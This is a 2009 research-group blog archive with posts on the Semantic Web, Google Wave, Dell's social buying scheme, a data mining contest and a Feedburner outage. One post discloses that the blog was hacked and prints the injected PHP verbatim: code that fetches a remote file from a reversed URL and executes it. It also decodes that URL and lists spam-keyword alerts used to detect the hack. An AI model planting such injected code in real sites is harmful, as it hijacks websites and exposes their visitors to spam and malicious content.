PricewaterhouseCoopers bullish on the Semantic Web

May 29th, 2009

PricewaterhouseCoopers is one of the largest “professional services” organizations and has always been strong on technology consulting and advice. The Spring issue of their quarterly Technology Forecast journal focuses on the Semantic Web. This is from the table of contents:


  • 04 Spinning a data Web. Semantic Web technologies could revolutionize enterprise decision making and information sharing. Here’s why.
  • 16 Traversing the Giant Global Graph. Tom Scott of BBC Earth describes how everyone benefits from interoperable data.
  • 20 Making Semantic Web connections. Linked Data technology can change the business of enterprise data management.
  • 28 From folksonomies to ontologies. Uche Ogbuji of Zepheira discusses how early adopters are introducing Semantic Web to the enterprise.
  • 40 How the Semantic Web might improve cancer treatment. M. D. Anderson’s Lynn Vogel explores new techniques for combining clinical and research data.
  • 46 Semantic technologies at the ecosystem level. Frank Chum of Chevron talks about the need for shared ontologies in the oil and gas industry.

You can download the free 58-page report here. You can also read a note on the issue in ReadWriteWeb, which focuses on linked data and interoperability.

“A new PricewaterhouseCoopers Technology report explains how the Semantic Web and Linked Data can help enterprises manage their large scale data better. The PwC Center for Technology and Innovation team spent several months researching and analyzing the problem of data silos in enterprises – and what solutions are being developed to help with that problem. The answer, according to PwC, is Semantic Web techniques. PwC believes that the Semantic Web offers a practical way to address the problem of large-scale data integration. …”

(Spotted on

Baltimore MD BarCamp on 20 June 2009

May 28th, 2009

There will be a BarCamp in Baltimore on Saturday, 20 June 2009 at the University of Baltimore. BarCamps are unconferences — “open, participatory workshop-events, whose content is provided by participants”.

Here’s how the Baltimore Sun described it:

“Organizers have scheduled the event on June 20 at the university’s Thumel Business Center. Following the BarCamp format, the event will have no pre-set agenda. Instead, attendees who show up that morning will determine the day’s program by suggesting and voting on topics. Such events usually attract artists, designers and people who work in technology and the Web. BarCamps got their start in California four years ago, and are now held all over the world. For more information, visit, or contact Mike Subelsky, an organizer, at Additional information about the BarCamp model can be found at”

Last year’s Baltimore BarCamp was focused on social media — see the blog post by UMBC ebiquity alumnus Dr. Harry Chen.

Google Wave as a new communication model

May 28th, 2009

Google Wave looks interesting. Google describes it as “a new tool for communication and collaboration on the web” and it’s a funny mix of email, instant messaging, wikis, and Facebook wall interactions. Or maybe IRC for the new century. This is from a post, Went Walkabout. Brought back Google Wave, on the Google blog.

“A “wave” is equal parts conversation and document, where people can communicate and work together with richly formatted text, photos, videos, maps, and more. Here’s how it works: In Google Wave you create a wave and add people to it. Everyone on your wave can use richly formatted text, photos, gadgets, and even feeds from other sources on the web. They can insert a reply or edit the wave directly. It’s concurrent rich-text editing, where you see on your screen nearly instantly what your fellow collaborators are typing in your wave. That means Google Wave is just as well suited for quick messages as for persistent content — it allows for both collaboration and communication. You can also use “playback” to rewind the wave and see how it evolved.”
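The mechanics in the quote (an append-only conversation that any participant can extend, plus a “playback” that replays its history) can be sketched as a toy model. Everything below, the class name, the operation format, the participants, is invented for illustration and is not Google Wave's actual data model or protocol.

```python
# Toy model of a "wave" as a replayable log of operations.
class Wave:
    def __init__(self):
        self.ops = []  # append-only log of (participant, action, payload)

    def add_participant(self, who):
        self.ops.append((who, "join", None))

    def append_text(self, who, text):
        self.ops.append((who, "append", text))

    def playback(self, upto=None):
        """Replay the first `upto` operations to reconstruct the state."""
        participants, text = set(), []
        for who, action, payload in self.ops[:upto]:
            participants.add(who)
            if action == "append":
                text.append(payload)
        return participants, "".join(text)

w = Wave()
w.add_participant("alice")
w.append_text("alice", "Hello")
w.add_participant("bob")
w.append_text("bob", ", world")
print(w.playback(2))  # state after two operations: ({'alice'}, 'Hello')
print(w.playback())   # final state, with both participants
```

Because state is just a fold over the log, "rewinding the wave" falls out for free: replay fewer operations.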

Google Wave is not available yet, but you can sign up to be notified when it’s launched.

Here’s a random thought. Our models for communication in multiagent systems (e.g., KQML and FIPA) were informed by, if not based on, email and, to a lesser degree, IM. If Wave is a useful new communication model for humans, does it have a counterpart for software agents? If so, I suspect that ideas from the Semantic Web will be useful to provide “rich content” for agents.

For more views, see posts by O’Reilly, TechCrunch, BusinessWeek and Gabor Cselle.

Dell Swarm: social network buying groups

May 27th, 2009

Dell is exploiting social networks in a new marketing scheme being tried out in Singapore. If you agree to buy a laptop on Dell Swarm, the discounted price drops as others join your “swarm” and also buy. Here’s how Dell describes it:

  • Start by picking the laptop you would like to purchase. Be the first buyer to join a Swarm and you’ll enjoy a price lower than Dell’s best discounted price (after cash rebates).
  • Join a Swarm after, and you’ll enjoy a new, lower price – as will all previous buyers. To see the range of prices, simply slide the Swarm price bar downwards.
  • Once the swarm closes – which is when the limit of 15 buyers or 72 hours is reached, whichever is earlier – the price is then finalised. This final, lowest price now becomes everyone’s purchase price – including yours!
  • To get the maximum discount, grow the Swarm by sharing with your friends. You can share via Twitter, or post a note on your Facebook® profile and tell all of your friends. Point others towards your Swarm using Digg and other tools. Or simply send your friends an email directly!
  • Not ready to buy yet? You can also choose to Follow the Swarm. You’ll then receive updates via email, as well as through free SMS alerts.
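The pricing mechanism in the steps above can be sketched in a few lines. The starting price, the per-buyer discount, and the resulting numbers are made up for illustration; Dell's actual price schedule is not described in the post, only the 15-buyer cap and the rule that the final price applies to everyone.

```python
# Sketch of swarm pricing: the price drops as buyers join, and the final
# (lowest) price applies retroactively to every buyer in the swarm.
START_PRICE = 1000.0  # hypothetical price for the first buyer
STEP = 20.0           # hypothetical discount per additional buyer
MAX_BUYERS = 15       # the swarm closes at 15 buyers (or after 72 hours)

def swarm_price(n_buyers):
    """Price paid by *every* buyer once n_buyers have joined."""
    n = min(n_buyers, MAX_BUYERS)
    return START_PRICE - STEP * (n - 1)

print(swarm_price(1))   # the first buyer's initial price: 1000.0
print(swarm_price(15))  # price for a fully grown swarm: 720.0
```

The retroactive rule is the marketing hook: early buyers have a direct incentive to recruit, since every new member lowers the price they themselves pay.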

We’ve seen this idea on the Web before (e.g., see Group Buying), but it is usually framed as a tool by and for consumers rather than a marketing strategy employed by vendors. This could be a big win for Dell. If it is, others will follow. The penetration of online social networking systems is much greater now and finding ways to exploit them for marketing is irresistible.

UCSD Data Mining Contest

May 24th, 2009

For the past five years UCSD has run a student data mining contest sponsored by FICO, the decision management firm famous for developing the FICO credit score. The details of the 2009 data mining contest were released last week with results due on 15 July.

“This year’s contest consists of two classification tasks based on e-commerce transaction anomaly data. The first task is to maximize accuracy of binary classification on a test data set, given a fully labeled training data set. The performance metric is the lift at 20% review rate. The second task is similar to task 1, but provides a couple of additional fields that have potential predictive information.”
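The performance metric quoted above, lift at a 20% review rate, can be unpacked with a small sketch: rank transactions by model score, "review" the top 20%, and compare the positive rate in that reviewed slice to the overall positive rate. The toy scores and labels below are invented; the contest's actual data and scoring code are not public in this post.

```python
# Lift at a fixed review rate: how much better than random the model's
# top-ranked slice is at concentrating positives (here, anomalies).
def lift_at_rate(scores, labels, rate=0.20):
    ranked = sorted(zip(scores, labels), key=lambda p: p[0], reverse=True)
    n_review = max(1, int(len(ranked) * rate))
    reviewed = ranked[:n_review]
    precision_at_rate = sum(y for _, y in reviewed) / n_review
    base_rate = sum(labels) / len(labels)
    return precision_at_rate / base_rate

# Toy data: 10 transactions, 2 anomalies, both scored highest by the model.
scores = [0.9, 0.8, 0.3, 0.2, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1]
labels = [1,   1,   0,   0,   0,   0,   0,   0,   0,   0]
print(lift_at_rate(scores, labels))  # top 20% catches all positives: lift 5.0
```

A random ranking gives lift 1.0; with a 20% base positive rate, 5.0 is the best achievable here, since the reviewed slice is purely positives.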

The contest is open to all full-time undergraduate and graduate students as well as postdocs. A total of $8,000 in prize money will be awarded in various categories.

(spotted on Hacker News)

Monitor Twitter for news of the zombie apocalypse

May 21st, 2009

Who says that Twitter is not useful? The Boston Police Department is on record as promising to use Twitter to alert us if and when the zombie apocalypse starts. You might want to check for #zombie before you go out the door in the morning.

Ebiquity Google alert tripwires triggered

May 21st, 2009

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

<?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot=""; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
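The obfuscation is trivial: the exploit stores its payload URL backwards and lets PHP's strrev() restore it at runtime, presumably to dodge naive string scanners. The same one-line decode in Python:

```python
# Reverse the string embedded in the injected PHP to reveal the payload URL.
obfuscated = "txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"
print(obfuscated[::-1])  # http://blogwp.info/detailed/example/pharm.txt
```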

We discovered the problem through a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography
  • viagra OR cialis OR levitra OR Phentermine OR Xanax

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.

Google alert for a hacked website

The results of this Google search reveal many compromised blogs from the .edu domain.

Wolfram Alpha is live, API description online

May 15th, 2009

Wolfram|Alpha is live. A document describing the Wolfram Alpha API can be found in Google’s cache.

Stephen Wolfram wrote today in a blog post, Wolfram|Alpha Is Launching: Made Possible by Mathematica, on its relation to Mathematica.

“Wolfram|Alpha defines a new direction in computing—that would simply not have been possible without Mathematica, and that in time will add some remarkable new dimensions to Mathematica itself. In terms of technology, Wolfram|Alpha is a uniquely complex software system, which has been entirely developed and deployed with Mathematica and Mathematica technologies. … When we launch Wolfram|Alpha this weekend, it will be running Mathematica on about 10,000 processor cores, using gridMathematica-based parallelism. And every single query that comes into the system will be served with webMathematica.”

And now, for a real test…

(spotted on Hacker News)

UPDATE: (5/18) The API document is now officially available.

Google supports RDFa and Microformats

May 12th, 2009

Google has announced that it will begin to recognize structured information encoded as metadata in either RDFa or microformats and use the metadata in search results snippets for reviews and people.

“Structured data makes the web a better place. It also helps Google better understand and present your page in search results. … Google’s first use of this data will be in search results snippets for two kinds of objects: Reviews and People. Providing more detail in search results helps users to understand the value of your pages. When users get more information showing how your page is relevant to their search, they’re more likely to click through to see the full page. … At Google, we believe in openness, so we are using two open standards to allow you to annotate structured data on your site: microformats and RDFa. Both standards allow markup of information on your pages.”
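As a rough illustration of the kind of markup this covers, here is a sketch of how review metadata might be pulled out of microformat class names. The class names (hreview, item, fn, rating) are the real hReview vocabulary, but the page snippet is made up, and Google's actual extraction pipeline is of course not public.

```python
# Extract hReview fields from microformat class attributes using only
# the standard-library HTML parser.
from html.parser import HTMLParser

PAGE = """
<div class="hreview">
  <span class="item"><span class="fn">Bob's Pizzeria</span></span>
  Rating: <span class="rating">4.5</span> out of 5.
</div>
"""

class ReviewExtractor(HTMLParser):
    WANTED = {"fn", "rating"}  # item name and review rating

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def handle_starttag(self, tag, attrs):
        classes = dict(attrs).get("class", "")
        hits = self.WANTED.intersection(classes.split())
        self._current = hits.pop() if hits else None

    def handle_data(self, data):
        if self._current:
            self.fields[self._current] = data.strip()
            self._current = None

parser = ReviewExtractor()
parser.feed(PAGE)
print(parser.fields)  # {'fn': "Bob's Pizzeria", 'rating': '4.5'}
```

The appeal for search engines is exactly this: the fields are unambiguous and machine-readable, so a snippet can show the rating without guessing at the page's prose.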

This is a case where Google is following Yahoo, which announced more general support for RDFa and microformats last fall in their SearchMonkey.

We expect that this is work in progress. While it’s great that Google is supporting RDFa annotations, they are asking people to start with the new RDF vocabulary defined at their site rather than reusing or integrating with existing, widely used vocabularies. Let’s hope that they embrace the LOD vision in the near future.

Can a programming language make you happy?

May 11th, 2009

We all know that some programming languages are a joy to use and others can be damned painful. Lukas Biewald ran an interesting experiment to gather some data about this in his post, The Programming Language with the Happiest Users.

“Which languages make programmers the happiest? … I decided to do a little market research. I scraped the top 150 most recent tweets on Twitter for the query “X language” where X was one of {COBOL, Ruby, Fortran, Python, Visual Basic, Perl, Java, Haskell, Lisp, C}. Then I asked three people on Amazon Mechanical Turk to verify that the tweet was on the topic. If so, I asked if the tweet seemed positive, negative or neutral. …”
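The scoring step implied by the quote (turn crowd-labeled tweets into a per-language ranking) is easy to sketch. The tweet labels below are invented, and the score here is simply the fraction of positive mentions, which is a simplification; Biewald's post does not pin down his exact formula.

```python
# Rank languages by the fraction of their tweets labeled "positive".
from collections import Counter

labeled = [
    ("Ruby", "positive"), ("Ruby", "positive"), ("Ruby", "neutral"),
    ("COBOL", "negative"), ("COBOL", "negative"), ("COBOL", "positive"),
]

def happiness(labeled_tweets):
    counts = {}
    for lang, label in labeled_tweets:
        counts.setdefault(lang, Counter())[label] += 1
    return {lang: c["positive"] / sum(c.values()) for lang, c in counts.items()}

scores = happiness(labeled)
print(sorted(scores, key=scores.get, reverse=True))  # ['Ruby', 'COBOL']
```

With real data the interesting choices are all upstream: filtering off-topic tweets (hence the Mechanical Turk verification step) and deciding how neutral and negative labels should weigh against positive ones.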

Great idea and a nice use of Amazon Mechanical Turk!

Analyzing covert social networks

May 10th, 2009

Science Daily notes a social networking paper that sounds interesting.

“A new approach to analyzing social networks, reported in the current issue of the International Journal of Services Sciences, could help homeland security find the covert connections between the people behind terrorist attacks. The approach involves revealing the nodes that act as hubs in a terrorist network and tracing back to individual planners and perpetrators.”

Yoshiharu Maeno and Yukio Ohsawa, Analyzing covert social network foundation behind terrorism disaster, Int. J. Services Sciences, 2009, 2, pp. 125-141. (preprint).

Abstract: This paper addresses a method to analyse the covert social network foundation hidden behind the terrorism disaster. It is to solve a node discovery problem, which means to discover a node, which functions relevantly in a social network, but escaped from monitoring on the presence and mutual relationship of nodes. The method aims at integrating the expert investigator’s prior understanding, insight on the terrorists’ social network nature derived from the complex graph theory and computational data processing. The social network responsible for the 9/11 attack in 2001 is used to execute simulation experiment to evaluate the performance of the method.
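The paper's node-discovery method is more involved than this, but the first step the Science Daily summary describes, revealing the nodes that act as hubs, can be approximated with plain degree centrality. The toy edge list below is invented for illustration and has nothing to do with the paper's 9/11 dataset.

```python
# Approximate hub detection: count each node's degree and return the
# highest-degree nodes. Degree centrality is a crude proxy for the
# paper's analysis, used here only to make the idea concrete.
from collections import Counter

edges = [
    ("a", "h"), ("b", "h"), ("c", "h"), ("d", "h"),  # h touches everyone
    ("a", "b"), ("c", "d"),
]

def hubs(edge_list, top=1):
    degree = Counter()
    for u, v in edge_list:
        degree[u] += 1
        degree[v] += 1
    return [node for node, _ in degree.most_common(top)]

print(hubs(edges))  # ['h']
```

The harder problem the paper targets is the inverse one: inferring a relevant node that never appears in the observed edge list at all, using prior knowledge about how such networks tend to be structured.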

Storms on Planet Social Media Research

May 7th, 2009

We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around I discovered that our server is unable to access any feeds that resolve to Feedburner.

Apparently Feedburner has a blacklist of IP addresses that it blocks and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. (I was able to get our own blog back onto Planet SMR because I reconfigured the system to revert to the old, non-Feedburner feed.)

We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour and only about ten of our feeds resolve to feedburner.

My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.

One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users and also be a good steward of the Web environment by blocking suspected web spammers from the feeds hosted by Feedburner.

So, my guess is that Google thinks that the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR. We also do not host any ads, which is a motivation for most splogs.

If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then there will be many other legitimate feed aggregator sites that have or soon will have this problem.

By the way — we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us at planet-smr at

update 5/8: We’ve identified and solved the problem, thanks to Google FeedBurner ‘community expert’ Franklin Tse. The problem was due to our having an old entry for the Feedburner IP address in the server’s /etc/hosts table. I think we added it when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget and come back to bite you.
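The failure mode is worth spelling out: a hostname pinned to an IP in /etc/hosts silently overrides DNS, so when the service later moves, your server keeps talking to the old address. A quick sanity check for such pinned entries, run here against a made-up hosts-file snippet (the IP and the comment are invented) rather than the real file:

```python
# List hostnames pinned to non-loopback addresses in an /etc/hosts-style
# text: these are the entries that override DNS and go stale.
HOSTS = """\
127.0.0.1   localhost
66.102.1.1  feeds.feedburner.com   # temporary fix -- long forgotten
"""

def pinned_hosts(hosts_text):
    pinned = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and blanks
        if not line:
            continue
        ip, *names = line.split()
        if ip != "127.0.0.1":
            pinned.extend(names)
    return pinned

print(pinned_hosts(HOSTS))  # ['feeds.feedburner.com']
```

Anything this turns up deserves a comment with a date and a reason, or better, removal once the temporary problem it patched is gone.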